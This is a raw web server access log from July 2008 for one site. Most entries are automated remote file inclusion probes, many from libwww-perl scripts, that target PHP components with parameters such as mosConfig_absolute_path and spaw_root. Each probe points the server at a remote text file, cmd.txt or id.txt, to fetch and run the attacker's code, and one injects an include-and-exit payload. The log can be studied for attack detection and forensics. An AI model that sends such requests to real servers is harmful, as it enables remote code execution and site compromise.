189.77.91.153 - - [24/Jul/2008:06:30:10 -0700] "GET /logs//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.dpfbrasil.net63.net/i.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
189.77.91.153 - - [24/Jul/2008:06:30:12 -0700] "GET //index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.dpfbrasil.net63.net/i.txt? HTTP/1.1" 200 18497 "-" "libwww-perl/5.800" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:30:45 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:30:45 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
194.85.89.114 - - [24/Jul/2008:06:32:08 -0700] "GET /logs/access_080313.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.allfreeipodsex.com/ipod.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.85.89.114 - - [24/Jul/2008:06:32:09 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.allfreeipodsex.com/ipod.gif????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:32:13 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:32:13 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
66.249.67.80 - - [24/Jul/2008:06:32:13 -0700] "GET /minamijewelry/html/bird.html HTTP/1.1" 200 20961 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:33:37 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:33:37 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
85.214.32.78 - - [24/Jul/2008:06:34:26 -0700] "GET /logs/index.php?INCLUDE_FOLDER=http://www.sing-kids.de//cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
85.214.32.78 - - [24/Jul/2008:06:34:27 -0700] "GET /index.php?INCLUDE_FOLDER=http://www.sing-kids.de//cmd.txt?? HTTP/1.1" 200 18395 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
67.15.70.35 - - [24/Jul/2008:06:34:36 -0700] "GET /logs/access_080103.log/errors.php?error=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.70.35 - - [24/Jul/2008:06:34:36 -0700] "GET /logs/errors.php?error=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.70.35 - - [24/Jul/2008:06:34:36 -0700] "GET /errors.php?error=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.70.35 - - [24/Jul/2008:06:34:52 -0700] "GET /logs/access_080104.log/errors.php?error=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.221.130.15 - - [24/Jul/2008:06:35:06 -0700] "GET /logs/access_080207.log//components/errors.php?error=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.221.130.15 - - [24/Jul/2008:06:35:06 -0700] "GET /logs//components/errors.php?error=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.231.0.98 - - [24/Jul/2008:06:35:11 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.0.98 - - [24/Jul/2008:06:35:11 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:35:19 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:35:19 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
67.15.70.35 - - [24/Jul/2008:06:35:44 -0700] "GET /logs/access.log%20//index.php?DOCUMENT_ROOT=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.84.151.157 - - [24/Jul/2008:06:35:57 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.151.157 - - [24/Jul/2008:06:35:57 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.151.157 - - [24/Jul/2008:06:35:57 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.15 - - [24/Jul/2008:06:36:09 -0700] "GET /logs/access_071219.log//components/errors.php?error=http://www.urabaenlinea.com/phpbb2//language/lang_english/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.32.78 - - [24/Jul/2008:06:36:23 -0700] "GET /logs/index.php?INCLUDE_FOLDER=http://www.sing-kids.de//cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
85.214.32.78 - - [24/Jul/2008:06:36:24 -0700] "GET /index.php?INCLUDE_FOLDER=http://www.sing-kids.de//cmd.txt?? HTTP/1.1" 200 18411 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:36:48 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:36:48 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
80.53.133.106 - - [24/Jul/2008:06:36:55 -0700] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.remi2b.net/modules/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.151.157 - - [24/Jul/2008:06:37:20 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.151.157 - - [24/Jul/2008:06:37:21 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.70.35 - - [24/Jul/2008:06:37:33 -0700] "GET /logs/access_080103.log/errors.php?error=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.70.35 - - [24/Jul/2008:06:37:33 -0700] "GET /errors.php?error=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.70.35 - - [24/Jul/2008:06:37:33 -0700] "GET /logs/errors.php?error=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.70.35 - - [24/Jul/2008:06:37:56 -0700] "GET /logs/access_080104.log/errors.php?error=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.70.35 - - [24/Jul/2008:06:38:04 -0700] "GET /logs/access.log/senetman/html/index.php?page=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.70.35 - - [24/Jul/2008:06:38:04 -0700] "GET /senetman/html/index.php?page=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.70.35 - - [24/Jul/2008:06:38:05 -0700] "GET /logs/senetman/html/index.php?page=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:38:33 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:38:33 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
66.249.67.80 - - [24/Jul/2008:06:38:51 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/thumbs/thumbs_img_0149.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" "dmulk.com"
85.114.135.126 - - [24/Jul/2008:06:38:58 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.135.126 - - [24/Jul/2008:06:38:58 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.36 - - [24/Jul/2008:06:38:58 -0700] "GET /logs/access_080218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.36 - - [24/Jul/2008:06:38:59 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.36 - - [24/Jul/2008:06:38:59 -0700] "GET /logs/access_080218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.36 - - [24/Jul/2008:06:38:59 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.36 - - [24/Jul/2008:06:39:00 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.36 - - [24/Jul/2008:06:39:00 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.36 - - [24/Jul/2008:06:39:00 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.36 - - [24/Jul/2008:06:39:00 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.70.35 - - [24/Jul/2008:06:39:01 -0700] "GET /logs/access.log/senetman/html/index.php?page=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.70.35 - - [24/Jul/2008:06:39:01 -0700] "GET /senetman/html/index.php?page=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.70.35 - - [24/Jul/2008:06:39:01 -0700] "GET /logs/senetman/html/index.php?page=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.23.156.36 - - [24/Jul/2008:06:39:04 -0700] "GET /logs/access_080218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.36 - - [24/Jul/2008:06:39:04 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.67.80 - - [24/Jul/2008:06:39:05 -0700] "GET /minamijewelry/html/testimonials.html HTTP/1.1" 200 12445 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
217.23.156.36 - - [24/Jul/2008:06:39:06 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.36 - - [24/Jul/2008:06:39:06 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.70.35 - - [24/Jul/2008:06:39:18 -0700] "GET /logs/access_080308.log/senetman/html/index.php?page=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:40:01 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:40:01 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
217.23.156.36 - - [24/Jul/2008:06:40:18 -0700] "GET /logs/access_080218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.36 - - [24/Jul/2008:06:40:18 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.36 - - [24/Jul/2008:06:40:20 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.36 - - [24/Jul/2008:06:40:20 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.36 - - [24/Jul/2008:06:40:21 -0700] "GET /logs/access_080218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.36 - - [24/Jul/2008:06:40:21 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.36 - - [24/Jul/2008:06:40:21 -0700] "GET /logs/access_080218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.36 - - [24/Jul/2008:06:40:22 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.36 - - [24/Jul/2008:06:40:22 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.36 - - [24/Jul/2008:06:40:22 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.36 - - [24/Jul/2008:06:40:22 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.23.156.36 - - [24/Jul/2008:06:40:23 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.megaservidores.cl/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.79.34 - - [24/Jul/2008:06:40:41 -0700] "GET /logs//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.34 - - [24/Jul/2008:06:40:43 -0700] "GET //index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 200 18493 "-" "libwww-perl/5.79" "www.dmulk.com"
201.238.195.13 - - [24/Jul/2008:06:40:44 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.238.195.13 - - [24/Jul/2008:06:40:45 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.130.79.34 - - [24/Jul/2008:06:40:52 -0700] "GET /logs/access_080105.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.238.195.13 - - [24/Jul/2008:06:40:53 -0700] "GET /logs/access_080104.log//skin/zero_vote/ask_password.php?dir=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
201.238.195.13 - - [24/Jul/2008:06:41:07 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?dir=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.238.195.13 - - [24/Jul/2008:06:41:07 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.238.195.13 - - [24/Jul/2008:06:41:08 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.238.195.13 - - [24/Jul/2008:06:41:13 -0700] "GET /logs/access_080104.log//skin/zero_vote/ask_password.php?dir=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.34 - - [24/Jul/2008:06:41:25 -0700] "GET /logs/access_080304.log//index.php?option=com_easyext&Itemid=&mosConfig_absolute_path=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.238.195.13 - - [24/Jul/2008:06:41:25 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://homert.100webspace.net/doc/flo1.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
201.238.195.13 - - [24/Jul/2008:06:41:26 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://homert.100webspace.net/doc/flo1.txt??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
201.238.195.13 - - [24/Jul/2008:06:41:26 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
201.238.195.13 - - [24/Jul/2008:06:41:26 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:41:30 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:41:30 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
74.6.18.246 - - [24/Jul/2008:06:41:32 -0700] "GET /logs/access_080321.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.25.10.95 - - [24/Jul/2008:06:41:49 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.10.95 - - [24/Jul/2008:06:41:52 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.215.79.214 - - [24/Jul/2008:06:41:53 -0700] "GET /logs/access_071225.log//include/write.php?dir=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.215.79.214 - - [24/Jul/2008:06:41:54 -0700] "GET //include/write.php?dir=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.215.79.214 - - [24/Jul/2008:06:41:54 -0700] "GET /logs//include/write.php?dir=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.10.95 - - [24/Jul/2008:06:41:55 -0700] "GET /logs/access_080218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.10.95 - - [24/Jul/2008:06:41:55 -0700] "GET /logs/access_071218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.70.35 - - [24/Jul/2008:06:42:08 -0700] "GET /logs/access_080308.log/senetman/html/index.php?page=http://www.fo-saverne.com/images/temp/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:43:00 -0700] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
69.89.31.129 - - [24/Jul/2008:06:43:00 -0700] "GET //e404.php?DOCUMENT_ROOT=http://www.stralingsrisicos.nl/images/gif/gif.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
91.151.100.50 - - [24/Jul/2008:06:43:34 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://rawcraft.info/spread.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.151.100.50 - - [24/Jul/2008:06:43:34 -0700] "GET /logs/access_080329.log/components/com_facileforms/facileforms.frame.php?ff_compath=http://rawcraft.info/spread.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.151.100.50 - - [24/Jul/2008:06:43:35 -0700] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://rawcraft.info/spread.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.238.195.13 - - [24/Jul/2008:06:43:43 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.concurs.org/tst.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.39 - - [24/Jul/2008:06:43:45 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.39 - - [24/Jul/2008:06:43:47 -0700] "GET /tmp/sess_2ab6767faf519633a2ea0b3a4b61cfde HTTP/1.1" 403 163 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
201.130.79.34 - - [24/Jul/2008:06:43:51 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.34 - - [24/Jul/2008:06:43:51 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.abunaissa.de/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
